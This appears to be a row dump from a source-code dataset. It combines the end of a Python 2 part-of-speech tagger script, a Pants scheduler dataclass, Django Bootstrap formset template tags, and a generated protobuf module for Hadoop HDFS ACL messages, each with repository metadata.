max_arg = (c + path[-1][prev_tag][0], prev_tag, t)
temp[tag] = max_arg
path.append(temp)
sequence = []
# adjust classifier weights for incorrectly predicted tag and gold tag:
elem = sorted([(z[0], z[1]) for z in path[-1].items()], key=lambda x: x[1][0])[-1]
gold_tag = elem[1][-1].gold_tag_1 + elem[1][-1].gold_tag_2
tok = elem[1][-1]
sequence.append((tok, gold_tag, elem[0]))
next_elem = elem[1][1]
for ind2 in range(len(path) - 2, -1, -1):
elem = next_elem
gold_tag = path[ind2][elem][-1].gold_tag_1 + path[ind2][elem][-1].gold_tag_2
tok = path[ind2][elem][-1]
sequence.append((tok, gold_tag, elem))
next_elem = path[ind2][elem][1]
for x in range(len(sequence) - 1, -1, -1):
print >> output, sequence[x][0].original_form_2.encode("utf-8") + "\t" + sequence[x][0].gold_tag_2.encode(
"utf-8") + \
"\t" + sequence[x][2][1].encode("utf-8")
print >> output, ""
output.close()
z1 = time.time()
print "\t\t" + str(z1 - z0) + " sec."
def tag(self, file_in, mod, file_out):
# load classifier vectors (model) and feature vector from file:
print "\tLoading the model and the features"
x0 = time.time()
model_list = self.load(mod)
feat_vec = model_list[0]
classifiers = model_list[1]
x1 = time.time()
print "\t" + str(len(feat_vec)) + " features loaded"
print "\t\t" + str(x1 - x0) + " sec."
print "\tTag file: " + file_in
print "\tCreating tokens with feature vectors"
y0 = time.time()
tokens = [] # save all instantiated tokens from training data, with finished feature vectors
tag_set = set() # gather all POS types
empty_feat_vec_count = 0
# read in sentences from file and generates the corresponding token objects:
for sentence in tk.sentences(codecs.open(file_in, encoding='utf-8')):
# create sparse feature vector representation for each token:
for t_id, token in enumerate(sentence):
if t_id == 0: # first token of sentence
try:
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
None, sentence[t_id + 1])
except IndexError: # happens if sentence length is 1
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
None, None)
elif t_id == len(sentence) - 1: # last token of sentence
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
sentence[t_id - 1], None)
else:
token.createFeatureVector(feat_vec, t_id, sentence[t_id],
sentence[t_id - 1], sentence[t_id + 1])
tokens.append(token)
tag_set.add(token.gold_pos)
if len(token.sparse_feat_vec) == 0:
empty_feat_vec_count += 1
tokens.append("_SENTENCE_DELIMITER_")
print "\t\t" + str(empty_feat_vec_count) + " tokens have no features of the feature set"
y1 = time.time()
print "\t\t" + str(y1 - y0) + " sec."
print "\tClassifying tokens"
z0 = time.time()
output = open(file_out, "w") # temporarily save classification to file for evaluation
for ind, t in enumerate(tokens):
if t == "_SENTENCE_DELIMITER_":
print >> output, ""
else:
if ind % (len(tokens) / 10) == 0 and not ind == 0:
print "\t\t" + str(ind) + "/" + str(len(tokens))
# expand sparse token feature vectors into all dimensions:
# expanded_feat_vec = t.expandFeatVec(len(feat_vec))
arg_max = ["", 0.0]
for tag in classifiers:
# temp = classifiers[tag].classify(expanded_feat_vec)
temp = classifiers[tag].classify(t.sparse_feat_vec)
# remember highest classification result:
if temp > arg_max[1]:
arg_max[0] = tag
arg_max[1] = temp
# set predicted POS tag:
t.predicted_pos = arg_max[0]
# print token with predicted POS tag to file:
print >> output, t.original_form.encode("utf-8") + "\t" + t.predicted_pos.encode("utf-8")
output.close()
z1 = time.time()
print "\t\t" + str(z1 - z0) + " sec."
# build mapping of features to vector dimensions (key=feature, value=dimension index):
def extractFeatures(self, file_in):
feat_vec = {}
affixes = find_affixes(file_in, 5)
# uppercase
feat_vec["uppercase_1"] = len(feat_vec)
feat_vec["uppercase_2"] = len(feat_vec)
# capitalized
feat_vec["capitalized_1"] = len(feat_vec)
feat_vec["capitalized_2"] = len(feat_vec)
for l in affixes:
for affix_length in l:
for affix in l[affix_length]:
if sum(l[affix_length][affix].values()) > 0:
if affixes.index(l) == 0:
feat_vec["suffix_" + affix + "_token_1"] = len(feat_vec)
feat_vec["suffix_" + affix + "_token_2"] = len(feat_vec)
elif affixes.index(l) == 1:
feat_vec["prefix_" + affix + "_token_1"] = len(feat_vec)
feat_vec["prefix_" + affix + "_token_2"] = len(feat_vec)
else:
feat_vec["lettercombs_" + affix + "_token_1"] = len(feat_vec)
feat_vec["lettercombs_" + affix + "_token_2"] = len(feat_vec)
# iterate over all tokens to extract features:
for sentence in tk.sentences(codecs.open(file_in, encoding='utf-8')):
for tid, token in enumerate(sentence):
# form:
if not "current_form_token_1_" + token.form_1 in feat_vec:
feat_vec["current_form_token_1_" + token.form_1] = len(feat_vec)
if not "current_form_token_2_" + token.form_2 in feat_vec:
feat_vec["current_form_token_2_" + token.form_2] = len(feat_vec)
if not "prev_form_token_2_" + token.form_1 in feat_vec:
feat_vec["prev_form_token_2_" + token.form_1] = len(feat_vec)
if tid > 0:
if not "prev_form_token_1_" + sentence[tid - 1].form_1 in feat_vec:
feat_vec["prev_form_token_1_" + sentence[tid - 1].form_1] = len(feat_vec)
if not "next_form_token_1_" + token.form_2 in feat_vec:
feat_vec["next_form_token_1_" + token.form_2] = len(feat_vec)
if tid < len(sentence) - 1:
if not "next_form_token_2_" + sentence[tid + 1].form_2 in feat_vec:
feat_vec["next_form_token_2_" + sentence[tid + 1].form_2] = len(feat_vec)
# form length
if not "current_word_len_token_1_" + str(len(token.form_1)) in feat_vec:
feat_vec["current_word_len_token_1_" + str(len(token.form_1))] = len(feat_vec)
if not "current_word_len_token_2_" + str(len(token.form_2)) in feat_vec:
feat_vec["current_word_len_token_2_" + str(len(token.form_2))] = len(feat_vec)
if not "prev_word_len_token_2_" + str(len(token.form_1)) in feat_vec:
feat_vec["prev_word_len_token_2_" + str(len(token.form_1))] = len(feat_vec)
if tid > 0:
if not "prev_word_len_token_1_" + str(len(sentence[tid - 1].form_1)) in feat_vec:
feat_vec["prev_word_len_token_1_" + str(len(sentence[tid - 1].form_1))] = len(feat_vec)
if not "next_word_len_token_1_" + str(len(token.form_2)) in feat_vec:
feat_vec["next_word_len_token_1_" + str(len(token.form_2))] = len(feat_vec)
if tid < len(sentence) - 1:
if not "next_word_len_token_2_" + str(len(sentence[tid + 1].form_2)) in feat_vec:
feat_vec["next_word_len_token_2_" + str(len(sentence[tid + 1].form_2))] = len(feat_vec)
# position in sentence
if not "position_in_sentence_token_1_" + str(tid - 1) in feat_vec:
feat_vec["position_in_sentence_token_1_" + str(tid - 1)] = len(feat_vec)
if not "position_in_sentence_token_2_" + str(tid) in feat_vec:
feat_vec["position_in_sentence_token_2_" + str(tid)] = len(feat_vec)
# pos tag (only if exists in training data)
if token.pos_tag_1:
if not "current_word_pos_token_1_" + str(token.pos_tag_1) in feat_vec:
feat_vec["current_word_pos_token_1_" + str(token.pos_tag_1)] = len(feat_vec)#
if token.pos_tag_2:
if not "current_word_pos_token_2_" + str(token.pos_tag_2) in feat_vec:
feat_vec["current_word_pos_token_2_" + str(token.pos_tag_2)] = len(feat_vec)
if token.pos_tag_1:
if not "prev_word_pos_token_2_" + str(token.pos_tag_1) in feat_vec:
feat_vec["prev_word_pos_token_2_" + str(token.pos_tag_1)] = len(feat_vec)
if tid > 0:
if sentence[tid - 1].pos_tag_1:
if not "prev_word_pos_token_1_" + str(sentence[tid - 1].pos_tag_1) in feat_vec:
feat_vec["prev_word_pos_token_1_" + str(sentence[tid - 1].pos_tag_1)] = len(feat_vec)
if token.pos_tag_2:
if not "next_word_pos_token_1_" + str(token.pos_tag_2) in feat_vec:
feat_vec["next_word_pos_token_1_" + str(token.pos_tag_2)] = len(feat_vec)
if tid < len(sentence) - 1:
if sentence[tid + 1].pos_tag_2:
if not "next_word_pos_token_2_" + str(sentence[tid + 1].pos_tag_2) in feat_vec:
feat_vec["next_word_pos_token_2_" + str(sentence[tid + 1].pos_tag_2)] = len(feat_vec)
return feat_vec
if __name__ == '__main__':
t0 = time.time()
import argparse
argpar = argparse.ArgumentParser(description='')
mode = argpar.add_mutually_exclusive_group(required=True)
mode.add_argument('-train', dest='train', action='store_true', help='run in training mode')
mode.add_argument('-test', dest='test', action='store_true', help='run in test mode')
mode.add_argument('-ev', dest='evaluate', action='store_true', help='run in evaluation mode')
mode.add_argument('-tag', dest='tag', action='store_true', help='run in tagging mode')
argpar.add_argument('-i', '--infile', dest='in_file', help='in file', required=True)
argpar.add_argument('-e', '--epochs', dest='epochs', help='epochs', default='1')
argpar.add_argument('-m', '--model', dest='model', help='model', default='model')
argpar.add_argument('-o', '--output', dest='output_file', help='output file', default='output.txt')
argpar.add_argument('-t1', '--topxform', dest='top_x_form', help='top x form', default=None)
argpar.add_argument('-t2', '--topxwordlen', dest='top_x_word_len', help='top x word len', default=None)
argpar.add_argument('-t3', '--topxposition', dest='top_x_position', help='top x position', default=None)
argpar.add_argument('-t4', '--topxprefix', dest='top_x_prefix', help='top x prefix', default=None)
argpar.add_argument('-t5', '--topxsuffix', dest='top_x_suffix', help='top x suffix', default=None)
argpar.add_argument('-t6', '--topxlettercombs', dest='top_x_lettercombs', help='top x letter combs', default=None)
argpar.add_argument('-decrease-alpha', dest='decrease_alpha', action='store_true', help='decrease alpha',
default=False)
argpar.add_argument('-shuffle-sentences', dest='shuffle_sentences', action='store_true', help='shuffle sentences',
default=False)
argpar.add_argument('-batch-training', dest='batch_training', action='store_true', help='batch training',
default=False)
args = argpar.parse_args()
t = posTagger()
if os.stat(args.in_file).st_size == 0:
print "Input file is empty"
else:
if args.train:
print "Running in training mode\n"
if not args.top_x_form:
print args.top_x_form
top_x = [args.top_x_form, args.top_x_word_len, args.top_x_position, args.top_x_prefix, args.top_x_suffix,
args.top_x_lettercombs]
t.train(args.in_file, args.model, int(args.epochs), top_x, args.decrease_alpha, args.shuffle_sentences,
args.batch_training)
elif args.test:
print "Running in test mode\n"
t.test(args.in_file, args.model, args.output_file)
elif args.evaluate:
print "Running in evaluation mode\n"
out_stream = open(args.output_file, 'w')
evaluate(args.in_file, out_stream)
out_stream.close()
elif args.tag:
print "Running in tag mode\n"
t.tag(args.in_file, args.model, args.output_file)
t1 = time.time()
print "\n\tDone. Total time: " + str(t1 - t0) + "sec.\n"
| 29,383 | -5 | 234 |
5f31560a74d5dfb63e7c3127102442b9295b9807 | 386 | py | Python | src/python/pants/init/bootstrap_scheduler.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 1,806 | 2015-01-05T07:31:00.000Z | 2022-03-31T11:35:41.000Z | src/python/pants/init/bootstrap_scheduler.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 9,565 | 2015-01-02T19:01:59.000Z | 2022-03-31T23:25:16.000Z | src/python/pants/init/bootstrap_scheduler.py | rcuza/pants | 0429258b181986eed856ae45af93b776727774a0 | [
"Apache-2.0"
] | 443 | 2015-01-06T20:17:57.000Z | 2022-03-31T05:28:17.000Z | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from pants.engine.internals.scheduler import Scheduler
@dataclass(frozen=True)
class BootstrapScheduler:
"""A Scheduler that has been configured with only the rules for bootstrapping."""
scheduler: Scheduler
| 27.571429 | 85 | 0.784974 | # Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from pants.engine.internals.scheduler import Scheduler
@dataclass(frozen=True)
class BootstrapScheduler:
"""A Scheduler that has been configured with only the rules for bootstrapping."""
scheduler: Scheduler
| 0 | 0 | 0 |
20f7b957862e865fca511976b35c043c5e91e60d | 756 | py | Python | django_bootstrap_dynamic_formsets/templatetags/bootstrap_dynamic_formsets.py | AHouy/django-bootstrap-dynamic-formsets | d8b99a43b185c0cdf3137ebc25d6ba13d5032644 | [
"MIT"
] | 23 | 2015-06-15T20:24:33.000Z | 2021-12-22T07:18:45.000Z | django_bootstrap_dynamic_formsets/templatetags/bootstrap_dynamic_formsets.py | AHouy/django-bootstrap-dynamic-formsets | d8b99a43b185c0cdf3137ebc25d6ba13d5032644 | [
"MIT"
] | 9 | 2015-06-16T18:11:16.000Z | 2018-04-04T15:45:08.000Z | django_bootstrap_dynamic_formsets/templatetags/bootstrap_dynamic_formsets.py | AHouy/django-bootstrap-dynamic-formsets | d8b99a43b185c0cdf3137ebc25d6ba13d5032644 | [
"MIT"
] | 19 | 2015-06-16T08:04:29.000Z | 2021-03-12T23:51:17.000Z | from django import template
from django.utils.html import format_html
register = template.Library()
@register.inclusion_tag('django_bootstrap_dynamic_formsets/dynamic_formsets.html')
@register.inclusion_tag('django_bootstrap_dynamic_formsets/dynamic_formsets_js.html',takes_context=True)
| 47.25 | 104 | 0.747354 | from django import template
from django.utils.html import format_html
register = template.Library()
@register.inclusion_tag('django_bootstrap_dynamic_formsets/dynamic_formsets.html')
def bootstrap_dynamic_formset(formset, can_order=False, can_delete=False,
form_wrapper="well", layout="", id_formset="id_form"):
return {"formset":formset, "can_order":can_order, "can_delete":can_delete,
"form_wrapper":form_wrapper, "layout":layout}
@register.inclusion_tag('django_bootstrap_dynamic_formsets/dynamic_formsets_js.html',takes_context=True)
def bootstrap_dynamic_formset_js(context):
return {'can_order':context['can_order'], 'can_delete':context['can_delete'],
'formset':context['formset']}
| 421 | 0 | 44 |
29b5f73253e00d865823d44734062de6df02df9d | 22,805 | py | Python | gen/acl_pb2.py | zizon/prpc | a075256eb55a31a535aa5e7fd0d00a78b3b44966 | [
"MIT"
] | null | null | null | gen/acl_pb2.py | zizon/prpc | a075256eb55a31a535aa5e7fd0d00a78b3b44966 | [
"MIT"
] | null | null | null | gen/acl_pb2.py | zizon/prpc | a075256eb55a31a535aa5e7fd0d00a78b3b44966 | [
"MIT"
] | null | null | null | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: acl.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
import hdfs_pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='acl.proto',
package='hadoop.hdfs',
serialized_pb='\n\tacl.proto\x12\x0bhadoop.hdfs\x1a\nhdfs.proto\"\xc4\x03\n\rAclEntryProto\x12:\n\x04type\x18\x01 \x02(\x0e\x32,.hadoop.hdfs.AclEntryProto.AclEntryTypeProto\x12<\n\x05scope\x18\x02 \x02(\x0e\x32-.hadoop.hdfs.AclEntryProto.AclEntryScopeProto\x12=\n\x0bpermissions\x18\x03 \x02(\x0e\x32(.hadoop.hdfs.AclEntryProto.FsActionProto\x12\x0c\n\x04name\x18\x04 \x01(\t\"-\n\x12\x41\x63lEntryScopeProto\x12\n\n\x06\x41\x43\x43\x45SS\x10\x00\x12\x0b\n\x07\x44\x45\x46\x41ULT\x10\x01\"=\n\x11\x41\x63lEntryTypeProto\x12\x08\n\x04USER\x10\x00\x12\t\n\x05GROUP\x10\x01\x12\x08\n\x04MASK\x10\x02\x12\t\n\x05OTHER\x10\x03\"~\n\rFsActionProto\x12\x08\n\x04NONE\x10\x00\x12\x0b\n\x07\x45XECUTE\x10\x01\x12\t\n\x05WRITE\x10\x02\x12\x11\n\rWRITE_EXECUTE\x10\x03\x12\x08\n\x04READ\x10\x04\x12\x10\n\x0cREAD_EXECUTE\x10\x05\x12\x0e\n\nREAD_WRITE\x10\x06\x12\x0c\n\x08PERM_ALL\x10\x07\"\x9f\x01\n\x0e\x41\x63lStatusProto\x12\r\n\x05owner\x18\x01 \x02(\t\x12\r\n\x05group\x18\x02 \x02(\t\x12\x0e\n\x06sticky\x18\x03 \x02(\x08\x12+\n\x07\x65ntries\x18\x04 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\x12\x32\n\npermission\x18\x05 \x01(\x0b\x32\x1e.hadoop.hdfs.FsPermissionProto\"X\n\x1cModifyAclEntriesRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x1f\n\x1dModifyAclEntriesResponseProto\"$\n\x15RemoveAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"\x18\n\x16RemoveAclResponseProto\"X\n\x1cRemoveAclEntriesRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x1f\n\x1dRemoveAclEntriesResponseProto\"+\n\x1cRemoveDefaultAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"\x1f\n\x1dRemoveDefaultAclResponseProto\"N\n\x12SetAclRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\x12+\n\x07\x61\x63lSpec\x18\x02 \x03(\x0b\x32\x1a.hadoop.hdfs.AclEntryProto\"\x15\n\x13SetAclResponseProto\"\'\n\x18GetAclStatusRequestProto\x12\x0b\n\x03src\x18\x01 \x02(\t\"H\n\x19GetAclStatusResponseProto\x12+\n\x06result\x18\x01 \x02(\x0b\x32\x1b.hadoop.hdfs.AclStatusProtoB5\n%org.apache.hadoop.hdfs.protocol.protoB\tAclProtos\xa0\x01\x01')
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO = _descriptor.EnumDescriptor(
name='AclEntryScopeProto',
full_name='hadoop.hdfs.AclEntryProto.AclEntryScopeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='ACCESS', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DEFAULT', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=255,
serialized_end=300,
)
_ACLENTRYPROTO_ACLENTRYTYPEPROTO = _descriptor.EnumDescriptor(
name='AclEntryTypeProto',
full_name='hadoop.hdfs.AclEntryProto.AclEntryTypeProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='USER', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GROUP', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MASK', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OTHER', index=3, number=3,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=302,
serialized_end=363,
)
_ACLENTRYPROTO_FSACTIONPROTO = _descriptor.EnumDescriptor(
name='FsActionProto',
full_name='hadoop.hdfs.AclEntryProto.FsActionProto',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='NONE', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXECUTE', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE', index=2, number=2,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WRITE_EXECUTE', index=3, number=3,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ', index=4, number=4,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_EXECUTE', index=5, number=5,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='READ_WRITE', index=6, number=6,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PERM_ALL', index=7, number=7,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=365,
serialized_end=491,
)
_ACLENTRYPROTO = _descriptor.Descriptor(
name='AclEntryProto',
full_name='hadoop.hdfs.AclEntryProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='hadoop.hdfs.AclEntryProto.type', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='scope', full_name='hadoop.hdfs.AclEntryProto.scope', index=1,
number=2, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='permissions', full_name='hadoop.hdfs.AclEntryProto.permissions', index=2,
number=3, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='hadoop.hdfs.AclEntryProto.name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_ACLENTRYPROTO_ACLENTRYSCOPEPROTO,
_ACLENTRYPROTO_ACLENTRYTYPEPROTO,
_ACLENTRYPROTO_FSACTIONPROTO,
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=39,
serialized_end=491,
)
_ACLSTATUSPROTO = _descriptor.Descriptor(
name='AclStatusProto',
full_name='hadoop.hdfs.AclStatusProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='owner', full_name='hadoop.hdfs.AclStatusProto.owner', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='group', full_name='hadoop.hdfs.AclStatusProto.group', index=1,
number=2, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sticky', full_name='hadoop.hdfs.AclStatusProto.sticky', index=2,
number=3, type=8, cpp_type=7, label=2,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='entries', full_name='hadoop.hdfs.AclStatusProto.entries', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='permission', full_name='hadoop.hdfs.AclStatusProto.permission', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=494,
serialized_end=653,
)
_MODIFYACLENTRIESREQUESTPROTO = _descriptor.Descriptor(
name='ModifyAclEntriesRequestProto',
full_name='hadoop.hdfs.ModifyAclEntriesRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.ModifyAclEntriesRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.ModifyAclEntriesRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=655,
serialized_end=743,
)
_MODIFYACLENTRIESRESPONSEPROTO = _descriptor.Descriptor(
name='ModifyAclEntriesResponseProto',
full_name='hadoop.hdfs.ModifyAclEntriesResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=745,
serialized_end=776,
)
_REMOVEACLREQUESTPROTO = _descriptor.Descriptor(
name='RemoveAclRequestProto',
full_name='hadoop.hdfs.RemoveAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=778,
serialized_end=814,
)
_REMOVEACLRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveAclResponseProto',
full_name='hadoop.hdfs.RemoveAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=816,
serialized_end=840,
)
_REMOVEACLENTRIESREQUESTPROTO = _descriptor.Descriptor(
name='RemoveAclEntriesRequestProto',
full_name='hadoop.hdfs.RemoveAclEntriesRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveAclEntriesRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.RemoveAclEntriesRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=842,
serialized_end=930,
)
_REMOVEACLENTRIESRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveAclEntriesResponseProto',
full_name='hadoop.hdfs.RemoveAclEntriesResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=932,
serialized_end=963,
)
_REMOVEDEFAULTACLREQUESTPROTO = _descriptor.Descriptor(
name='RemoveDefaultAclRequestProto',
full_name='hadoop.hdfs.RemoveDefaultAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.RemoveDefaultAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=965,
serialized_end=1008,
)
_REMOVEDEFAULTACLRESPONSEPROTO = _descriptor.Descriptor(
name='RemoveDefaultAclResponseProto',
full_name='hadoop.hdfs.RemoveDefaultAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1010,
serialized_end=1041,
)
_SETACLREQUESTPROTO = _descriptor.Descriptor(
name='SetAclRequestProto',
full_name='hadoop.hdfs.SetAclRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.SetAclRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='aclSpec', full_name='hadoop.hdfs.SetAclRequestProto.aclSpec', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1043,
serialized_end=1121,
)
_SETACLRESPONSEPROTO = _descriptor.Descriptor(
name='SetAclResponseProto',
full_name='hadoop.hdfs.SetAclResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1123,
serialized_end=1144,
)
_GETACLSTATUSREQUESTPROTO = _descriptor.Descriptor(
name='GetAclStatusRequestProto',
full_name='hadoop.hdfs.GetAclStatusRequestProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='src', full_name='hadoop.hdfs.GetAclStatusRequestProto.src', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=unicode("", "utf-8"),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1146,
serialized_end=1185,
)
_GETACLSTATUSRESPONSEPROTO = _descriptor.Descriptor(
name='GetAclStatusResponseProto',
full_name='hadoop.hdfs.GetAclStatusResponseProto',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='result', full_name='hadoop.hdfs.GetAclStatusResponseProto.result', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1187,
serialized_end=1259,
)
_ACLENTRYPROTO.fields_by_name['type'].enum_type = _ACLENTRYPROTO_ACLENTRYTYPEPROTO
